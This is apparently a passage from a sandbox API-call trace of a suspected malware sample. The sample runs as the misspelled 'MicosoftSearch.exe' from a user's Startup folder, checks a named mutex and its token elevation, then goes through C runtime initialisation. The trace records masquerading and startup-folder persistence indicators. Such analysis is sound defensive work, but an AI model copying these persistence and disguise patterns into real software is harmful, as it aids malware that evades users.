HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb0c8d8 | out: hHeap=0xab0000) returned 1 [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x7) returned 0xb09df0 [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x10) returned 0xac0b88 [0239.965] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xac0b88, Size=0x20) returned 0xb0cd48 [0239.965] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xb0cd48, Size=0x40) returned 0xb0c8d8 [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0xfffe) returned 0xb1d358 [0239.966] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0U") returned 0x88 [0239.966] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb09df0 | out: hHeap=0xab0000) returned 1 [0239.966] lstrlenW (lpString="Global\\syncronize_") returned 18 [0239.966] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb0c8d8 | out: hHeap=0xab0000) returned 1 [0239.966] GetVersion () returned 0x1db10106 [0239.966] GetCurrentProcess () returned 0xffffffff [0239.966] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fd10 | out: TokenHandle=0x18fd10*=0x8c) returned 1 [0239.966] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fd0c, TokenInformationLength=0x4, ReturnLength=0x18fd18 | out: TokenInformation=0x18fd0c, ReturnLength=0x18fd18) returned 1 [0239.966] CloseHandle (hObject=0x8c) returned 1 [0239.966] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x102 [0239.966] ExitProcess (uExitCode=0x0) [0240.173] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "9" image_name = "micosoftsearch.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe" page_root = "0x763b7000" os_pid = "0x55c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e4d3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x560 [0236.187] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xba05ce20, dwHighDateTime=0x1d5351d)) [0236.187] GetCurrentProcessId () returned 0x55c [0236.187] GetCurrentThreadId () returned 0x560 [0236.187] GetTickCount () returned 0x5f2f [0236.187] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=6784897840) returned 1 [0236.187] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x42c114)) [0236.187] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2490000 [0236.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0236.189] GetProcAddress (hModule=0x75a00000, lpProcName="FlsAlloc") returned 0x75a14f2b [0236.189] GetProcAddress (hModule=0x75a00000, lpProcName="FlsGetValue") returned 0x75a11252 [0236.189] GetProcAddress (hModule=0x75a00000, lpProcName="FlsSetValue") returned 0x75a14208 [0236.189] GetProcAddress (hModule=0x75a00000, lpProcName="FlsFree") returned 0x75a1359f [0236.189] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0236.189] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.933] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.934] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.934] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.934] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.934] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.934] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.934] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.934] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.935] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.935] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.935] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.935] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.935] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.935] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0237.935] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x214) returned 0x24907d0 [0237.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.936] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0237.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.936] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0237.936] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0237.936] GetCurrentThreadId () returned 0x560 [0237.936] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0237.936] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x800) returned 0x24909f0 [0237.936] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0237.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0237.936] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0237.936] SetHandleCount (uNumber=0x20) returned 0x20 [0237.937] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe\" " [0237.937] GetEnvironmentStringsW () returned 0xb11f98* [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x0, Size=0xb02) returned 0x24911f8 [0237.937] FreeEnvironmentStringsW (penv=0xb11f98) returned 1 [0237.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x927d08, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe")) returned 0x6e [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x0, Size=0xe6) returned 0x2491d08 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x9c) returned 0x2491df8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x3e) returned 0x2491ea0 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x6c) returned 0x2491ee8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x6e) returned 0x2491f60 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x78) returned 0x2491fd8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x62) returned 0x2492058 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x2e) returned 0x24920c8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x48) returned 0x2492100 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x28) returned 0x2492150 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x1a) returned 0x2492180 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x4a) returned 0x24921a8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x72) returned 0x2492200 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x30) returned 0x2492280 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x2e) returned 0x24922b8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x1c) returned 0x24922f0 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0xd2) returned 0x2492318 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x7c) returned 0x24923f8 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x36) returned 0x2492480 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x3a) returned 0x24924c0 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x90) returned 0x2492508 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x24) returned 0x24925a0 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x30) returned 0x24925d0 [0237.937] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x36) returned 0x2492608 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x48) returned 0x2492648 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x52) returned 0x2492698 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x3c) returned 0x24926f8 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x82) returned 0x2492740 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x2e) returned 0x24927d0 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x28) returned 0x2492808 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x1e) returned 0x2492838 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x2c) returned 0x2492860 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x54) returned 0x2492898 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x52) returned 0x24928f8 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x2a) returned 0x2492958 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x3c) returned 0x2492990 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x54) returned 0x24929d8 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x24) returned 0x2492a38 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x30) returned 0x2492a68 [0237.938] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x8c) returned 0x2492aa0 [0237.938] HeapFree (in: hHeap=0x2490000, dwFlags=0x0, lpMem=0x24911f8 | out: hHeap=0x2490000) returned 1 [0237.973] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x8, Size=0x80) returned 0x2492b38 [0237.973] GetLastError () returned 0x0 [0237.973] SetLastError (dwErrCode=0x0) [0237.973] GetLastError () returned 0x0 [0237.973] SetLastError (dwErrCode=0x0) [0237.973] GetLastError () returned 0x0 [0237.973] SetLastError (dwErrCode=0x0) [0237.973] GetACP () returned 0x4e4 [0237.973] RtlAllocateHeap (HeapHandle=0x2490000, Flags=0x0, Size=0x220) returned 0x2492bc0 [0237.973] GetLastError () returned 0x0 [0237.973] SetLastError (dwErrCode=0x0) [0237.973] IsValidCodePage (CodePage=0x4e4) returned 1 [0237.974] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0237.974] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0237.974] GetLastError () returned 0x0 [0237.974] SetLastError (dwErrCode=0x0) [0237.974] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0237.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.974] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0237.974] GetLastError () returned 0x0 [0237.974] SetLastError (dwErrCode=0x0) [0237.974] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0237.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ槿⾘倍BĀ") returned 256 [0237.974] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ槿⾘倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0237.974] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ槿⾘倍BĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.974] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf7\x51\xb2\x2e\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0237.974] GetLastError () returned 0x0 [0237.974] SetLastError (dwErrCode=0x0) [0237.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ槿⾘倍BĀ") returned 256 [0237.974] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ槿⾘倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0237.974] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ槿⾘倍BĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0237.974] WideCharToMultiByte (in: 